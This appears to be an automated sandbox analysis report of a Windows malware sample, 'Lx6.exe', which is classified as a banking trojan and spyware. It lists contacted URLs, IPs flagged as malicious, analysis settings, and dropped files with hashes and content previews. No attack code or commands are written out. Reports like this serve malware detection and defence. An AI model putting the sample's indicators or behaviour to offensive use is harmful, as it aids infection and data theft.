https://www.hoeren-heute.ch/d/horizon_reveal/?act=ACT0000044974ACT&utm_source=mcrs&utm_mediu	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/news/other/bundesratswahl-alle-augen-richten-sich-nach-bern/ar-AA12LMZu?oc	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.tippsundtricks.co/saubermachen/reinige-dusche-spulmaschinentab/?utm_campaign=DECH-spulit	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hoeren-heute.ch/d/nulltarif_offer/?act=ACT0000045540ACT&utm_source=mcrs&utm_medi	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.tippsundtricks.co/lifehacks/dosenoeffner-falsch-benutzt/?utm_campaign=DECH-canopen&u	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.msn.com/de-ch	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipinfo.io/ip	cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/news/other/wie-deine-abgeschnittenen-haare-seen-s%c3%a4ubern-k%c3%b6nnen/a	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://constitution.org/usdeclar.txt	Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ogp.me/ns#	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/sport/other/fcz-bleibt-letzter-lugano-schl%c3%a4gt-basel-servette-und-luze	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ns.micro/1	RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.76.225.60	unknown	Germany	58329	RACKPLACEDE	true
194.76.225.61	unknown	Germany	58329	RACKPLACEDE	true
204.79.197.203	a-0003.a-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	720586
Start date and time:	2022-10-11 15:00:24 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Lx6.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	89
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	4
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.bank.troj.spyw.expl.evad.winEXE@132/40@6/4
EGA Information:	Successful, ratio: 83.3%
HDC Information:	Successful, ratio: 3.2% (good quality ratio 3.2%) Quality average: 90.9% Quality standard deviation: 14.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 162 Number of non-executed functions: 351
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 52.169.118.173, 131.253.33.203
Excluded domains from analysis (whitelisted): redirection.prod.cms.msn.com.akadns.net, icePrime.a-0003.dc-msedge.net, legacy-redirection-neurope-prod-hp.cloudapp.net, a-0003.dc-msedge.net
Execution Graph export aborted for target mshta.exe, PID 6016 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:02:07	API Interceptor	36x Sleep call for process: powershell.exe modified
15:03:23	API Interceptor	1x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	91
Entropy (8bit):	3.964980110923723
Encrypted:	false
SSDEEP:	3:ApEeKm8RKQB2LI/cAtAFqyLAIRlKFvBFGmWLn:ApEVNB2LI/xyFqyLbgzGdn
MD5:	99BDE3452748E34D6C50275110A6A8D4
SHA1:	E79CB2A8DB7D8490523529D3861F95BA73A20C23
SHA-256:	D07311ACF641866E7E84823D2962F593BB655792301DC61AD6F0C6869D9C5937
SHA-512:	19FD529C6FE60BBBE3710FED93F14D723A13AD427431F855ED84F5E5E496B9F3EB8A6E8C31D740239EB225753D52A4F464B489FDBDEFF4477480026263D0F691
Malicious:	false
Reputation:	unknown
Preview:	Cookies are no longer stored in files. Please use InternetCookie APIs to access cookies.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.8910535897909355
Encrypted:	false
SSDEEP:	192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
MD5:	7A57D8959BFD0B97B364F902ACD60F90
SHA1:	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
SHA-256:	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
SHA-512:	83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1196
Entropy (8bit):	5.333915035046385
Encrypted:	false
SSDEEP:	24:3aZPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJF9G:qZPerB4nqRL/HvFe9t4Cv94anG
MD5:	B15D7C50C640BEF4A1E823CE568A5E5E
SHA1:	E456E2EE754F8FBA38F8F75858491258896C9E41
SHA-256:	A95974F134C10C31BF7B1243C3E5F3987F1CC878565E28182DEC577D552450C0
SHA-512:	B7E7D0303E3DCF81217B7AC871AF1C4871D8BA19CC595DB35A6640108411126666D244D8CF91D766E129E7306FBCBA9622746DF74EC030E180CFDEDB78239107
Malicious:	false
Reputation:	unknown
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\7C7B.bin\AuthRoot.pfx

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	23186
Entropy (8bit):	7.991041231447328
Encrypted:	true
SSDEEP:	384:ggOhdqMgQhhzLVz83kuWP5gzpr62Lr6T7YHVnn5UGY3QnG33Ov++pz2MAA1:g7uMFDR83BW5t2Pw7Yn6G+QnG33OvD+Q
MD5:	7B8BB9BA943395C3D6130174C4732F46
SHA1:	2A1B26AEC73001E44B98A8FC5F66DB7238CA0459
SHA-256:	03C5A6DCC0449B3AADEA6C0BB05747258B89BD40989DA04292A093174587D145
SHA-512:	12F9A12559F0422A29853FDC1416DFCC2DEEE1E2F4812DEC7DA05FA5996A3E557413B23E43ED3EBB514A30E489217D0505D86B627048C929806DDDDCEA0B8E8E
Malicious:	false
Reputation:	unknown
Preview:	0.Z....0.ZJ...H........Z;..Z70.Z30.Z/...H........Z 0.Z....0.Z....H......0....H.......0...0...&.4......Y.......%....t....c..^.@J..8.V.d...."...O.D....kmb?..A_.....y..zm...C......r...t..K..N4Or.?]..f..u......R...9.+.6......e...T.2.......hb.6..!.. ..S.Z%.i..b<Qq.S.^..`q.zB.tpM\.N.-.Sj.....g....Z@S.7...<2.f...%-...k.F.. ..n/..........3...]....AJ.........8&..J`....M..`..'>...q[%.S......g6...\|...b253.u..J...he..i...`......]....j....&.<...p.g0+..T..O..o[....i......)l..Mj\..z..."]8......../....+l..@.3#....2...[..)./.W.....p..%.oG...}..j...[>cd:<.....\....4.......D?D...a.....x..m.......!.,..sN...<D...$F..FT.............c..o.-..h]r;..>C..!?..b.....0...6.qN.#..R.(T.2.8...\.E3.g...%I...CV<.A..2...@.)...w(.e$Q.(..{x....aZ....H.'R%......W.k..P...K.......'J.Ph.....).....D&...Le..,61...j.1..hf..6.!d.G...H'..).O.B.......@4.V/C.....M..p.m`.&._........[...OL......+C...OY.P...E..7y...@......4..(=.=.a.e..7T...Y.<..jf...*^...^......U.....}.n...."1..

C:\Users\user\AppData\Local\Temp\7C7B.bin\Root.pfx

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	35938
Entropy (8bit):	7.994766403336213
Encrypted:	true
SSDEEP:	768:Uo9Rx7xPqGyIiVDpZcF2P++y96cih96w9KUDBUNTwDc:U4vRyIiKF2PaC9pKgc
MD5:	E6454209B0DBAD79DD2219F2BE137C33
SHA1:	9710D1CBB96DAFD14BC13E703404FDC9AC4EA7A9
SHA-256:	5DC604E8667BF29DFA0F2734C5E726222E1D75F553D719ED00A40BCF3BBABBB1
SHA-512:	1A8A810673C4BF63AB067DD393AB56BFF02EE4902A12E38A52E0818683D0C413A31EBB49B7896E09E2071D1B66BB33D70D61AB3D5C49C72C10ED5080B8207FAB
Malicious:	false
Reputation:	unknown
Preview:	0..^...0......H..............0...0......H..........0......0......H......0....H.......0...5iZIl.(.............b....oJ)......y.....`..GfN.h.,_Af.:..'Cj.O ....>...i.i.x...D\....y........n....Q..h.@S..V..0fP.:-<.A..`I...E.G....x0+.s.?.J..Llb...FH....`Cmak`.....2..bB.........$.I-.x.........l...._.S.nW)...a.Y...s.5.EU.;..U....X`]1~.%.5......9....n..t..(hBl..zm.HH.A.Vvj.)Y/..\.F.F.@,..{...nGG..o.A...]......Q/..#.kXG.e.g......&..G...>... .F..Mak.JO5-Lc9........K......Jj^j..B.~..}.@+~N..zl.....-..m@.]..."4'....Y4%.HX."k..>j`...(.Z.B....e.\n...R>......Z...%$K..?).<..zIt.fkUG...J...fF.3../>....l.m.X...g\|K.t.oMd..uk.0...........B.`.o.Y.\|yW8...K...b.L.....o.i......<}.^.....5AH...C.......@...'......k.!.Q.R...O.CV...;....b..em...<...z..q.....F.....k..C.~.c8..]2.>.....Zn..H.lb....{..y...j..[.......K.+.^rP>.,.%..w..L6Eo....j..'8]5.x.<..{.........s.......xZ........v..X .0,.x.l....E../....o.Q5,Y\|/..h....vn.m...).(...fKX.\|..J-..y......o..H].S.o.I.../

C:\Users\user\AppData\Local\Temp\9AF9.bin1

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	51361
Entropy (8bit):	4.028932530672399
Encrypted:	false
SSDEEP:	1536:sN9o5SEZZqpzteV2tTFGCTY9gOT7N2Vm2BKH9AM2KkbcM4txsEpucqRODKgCQ+FF:sXVB9Q4
MD5:	645D3031D145462946205BF1816CF775
SHA1:	E632126C947282571E610F7F085A7BA6B94AFD83
SHA-256:	A0940F2F95730625759933A5C8D872655BD805229F42BB9497A9F09359E2A73B
SHA-512:	2A1DB7AD892A766854550D54F0A04258C1780048050E122B47B8033A2F33AB08790B20B3982C3AADF931E0288DDD959467FE0D6D332438CE24D6F5AC44A3040F
Malicious:	false
Reputation:	unknown
Preview:	..Host Name: computer..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 6/27/2019, 4:49:21 PM..System Boot Time: 8/6/2022, 3:39:30 PM..System Manufacturer: P6WmNR3TnU9PMR7..System Model: fEhWFAHT..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: 37431 YCB22, 6/25/2021..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:

C:\Users\user\AppData\Local\Temp\9F2A.bin

Download File

Process:	C:\Windows\explorer.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	59353
Entropy (8bit):	7.995568822525134
Encrypted:	true
SSDEEP:	1536:97HFq3BWP2PwY/nGHOLL4vRyIiKF2PaC9pK9U:zqRWuoY/nHUp2bgq
MD5:	6357C3EEA8C8B15C9A1EE1367511CF6A
SHA1:	FB17AE6B2E3DF9223D6905B27B9F2E512F92A400
SHA-256:	2761604BBA63DCE47B932B28048D75DEBB7396B7FAAA9260176A806B13DB49EA
SHA-512:	64A305AE4DB5D26F1ECFC57DBE6E221EE60D71DA3C9BBF75A52E65A376F0D95203C44509E229FD1038A40522FC9A130E533D5AF7967C84BE4866DE1B3A0036FA
Malicious:	false
Reputation:	unknown
Preview:	PK............MOA..Z...Z......AuthRoot.pfx..Zm.0.Z....0.ZJ...H........Z;..Z70.Z30.Z/...H........Z 0.Z....0.Z....H......0....H.......0...0...&.4......Y.......%....t....c..^.@J..*8.V.d...."...O.D....kmb?..A_.....y..zm...C......r...t..K..N4Or.?]..f..u......R...9.+.6......e...T.2.......hb.6..!.. ..S.Z%.i..b<Qq.S.^..`q.zB.tpM\.N.-.Sj.....g....Z@S.7...<2.f...%-...k.F.. ..n/..........3...]....AJ.........8&..J`....M..`..'>...q[%.S......g6...\|...b253.u..J...he..i...`......]....j....&.<...p.g0+..T..O..o[....i......)l..Mj\..z..."]8......../....+l..@.3#....2...[..)./.W.....p..%.oG...}..j...[>cd:<.....\....4.......D?D...a.....x..m.......!.,..sN...<D...$F..FT.............c..o.-..h]r;..>C..!?..b.....0...6.qN.#..R.(T.2.8...\.E3.g...%I...CV<.A..2...@.)...w(.e$Q.(..{x....aZ....H.'R%......W.k..P...K.......'J.Ph.....).....D&...Le..,61...j.1..hf..6.!d.G...H'..).O.B.......@4.V/C.....M..p.m`.&._........[...OL......+C...OY.P...E..7y...@......4..(=.=.a.e..7T

C:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1056479064968565
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryE8ak7Ynqq1RPN5Dlq5J:+RI+ycuZhNtakS7PNnqX
MD5:	FB161B42FD0D3B703F12B95057877CA4
SHA1:	489BEC19D578A871CDC88B83751A6B16715CE9B4
SHA-256:	C4879FCE577085F0D497BC3BCD1EEDFAE9BE8D29758E47DE75EFA129FD3112A7
SHA-512:	8F1A32DD855C52210F99456FFAC8CCCBCD6A8F8C33AA463AFF5B97A75992CD3CF7D285495CD7D5259C323A21ECC7E79567E12A19939C27D76E7A7BA54DFBB6C4
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.y.r.5.j.f.x.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.y.r.5.j.f.x.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1080474271990184
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryLNTYak7YnqqmNTNPN5Dlq5J:+RI+ycuZhN5pYakSmpNPNnqX
MD5:	0E91ECA701345D22466D0EA4428A3EB8
SHA1:	0B1326B4EB0685BA013862319736A82ED52214C3
SHA-256:	FB4DDD90E5704E1527189C3BA5F885DB146D5BD345280B0851DF22A8613D50C5
SHA-512:	4479F463617B26731BDF977C71988C5E62F71AD46F4A8E9B33B0632BA80693B845B4043FB343F403A320D6618571B7EE499768E675DFAF87A92FBDCFCC6C6400
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.i.h.j.3.z.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.i.h.j.3.z.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1052394426855807
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEIak7Ynqq9dPN5Dlq5J:+RI+ycuZhNBakSvPNnqX
MD5:	F61ACBD222CA9E142FFBA13FD827898D
SHA1:	854A50C38E7D202D2CFA794768276819FC745538
SHA-256:	4F79AB9A5B95B451BA6538E2E49D9854562A63CC9934D521AF07967A2CB065E0
SHA-512:	8ABF5B4E273975471CCE5A91CE17033949C2C196092ED7856CC250E9BFB84EDBD4ED9008F07353B8291C404137C025E7D63F0805EC3DFBB8268646B9F6DC9A0F
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.u.p.j.0.y.h.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.u.p.j.0.y.h.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1160323863458923
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6iak7Ynqq3jPN5Dlq5J:+RI+ycuZhNciakS3jPNnqX
MD5:	7250F80F25A40F7947457212CDAC37CB
SHA1:	F9FD2CB47BA5443050B682FDF3E157126A5B4B5A
SHA-256:	DDA52729236A02DA2BB9DF07593BD0F1C1862AA4BF499B85952A75A4562B65FC
SHA-512:	AC05CFCBE1CB2856F9A019BFDDA5BB98C065C7B42FBF33C3E4BB0EDFF3B0F83625F489CFFB967A832227E0A57A3B102D6052336C43D59871A39877F21B90FE0B
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.x.p.j.p.f.g.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.x.p.j.p.f.g.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES501C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Tue Oct 11 13:05:19 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.985512109709175
Encrypted:	false
SSDEEP:	24:HugnW9NfMlXDfHAhKdNWI+ycuZhNBakSvPNnq9hgd:boMlzCKd41ulBa3tq9y
MD5:	E6495FDCD4030F492CBA20B3C51591EF
SHA1:	2D9044E00AAC14E6318C0DF558DADA012586B8CE
SHA-256:	798FE5176580696CC341901CBF76CD93EF6D320B84E96AD02A87370D675C5141
SHA-512:	C0D30967D7DDF2DCB712ACE2CF102EB4F8847C1421C2C9426FB0B5C902E7F405C89C2B82D39DFDC596D24C2E62A9BFB149653C81B43264843C928D3E3CCD962E
Malicious:	false
Reputation:	unknown
Preview:	L....jEc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP...................."../..?.'............4.......C:\Users\user\AppData\Local\Temp\RES501C.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.u.p.j.0.y.h.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\RESA4F5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Tue Oct 11 13:02:17 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.9804591091508197
Encrypted:	false
SSDEEP:	24:H7inW9Nf+3DfHZhKdNWI+ycuZhNtakS7PNnq9hgd:bEoQHKd41ulta3xq9y
MD5:	8FA4C6D7DAE78BB8A494CCCBAC1546AA
SHA1:	5ED5A92375463FCEDCF061D398A46B1DC0D2E2D3
SHA-256:	317E36EEA023691F12D8569D03906161E6D27F983582A25D19663526E15E74EE
